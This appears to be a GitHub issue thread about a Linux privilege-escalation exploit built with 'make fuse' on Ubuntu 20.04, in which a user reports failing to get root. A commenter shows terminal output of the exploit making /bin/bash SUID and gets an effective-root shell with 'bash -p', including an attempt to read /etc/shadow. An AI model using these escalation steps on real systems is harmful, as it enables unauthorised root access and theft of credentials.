chop0
commented
2 years ago maybe try making the suid binary something else besides bash
Open mortals-tx opened 2 years ago
chop0
commented
2 years ago maybe try making the suid binary something else besides bash
bcoles
commented
2 years ago /bin/bash is executed from within the exploit context which is running in a user namespace.
The set-uid bit was applied successfully. You should get a root shell with /bin/bash -p :
[*] Exploit success! /bin/bash is SUID now!
[+] Popping shell
-p: /root/.bash_profile: Permission denied
root@ubuntu-20-04-desktop-amd64:/home/user# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
root@ubuntu-20-04-desktop-amd64:/home/user# cat /etc/shadow
cat: /etc/shadow: Permission denied
root@ubuntu-20-04-desktop-amd64:/home/user# logout
-p: /root/.bash_logout: Permission denied
user@ubuntu-20-04-desktop-amd64:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1183448 Feb 25 2020 /bin/bash
user@ubuntu-20-04-desktop-amd64:~$ /bin/bash -p
bash-5.0# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare)
Linux c 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
command: make fuse
[*] Exploit success! /bin/bash is SUID now! [+] Popping shell -p: /root/.bash_profile: Permission denied
No access to root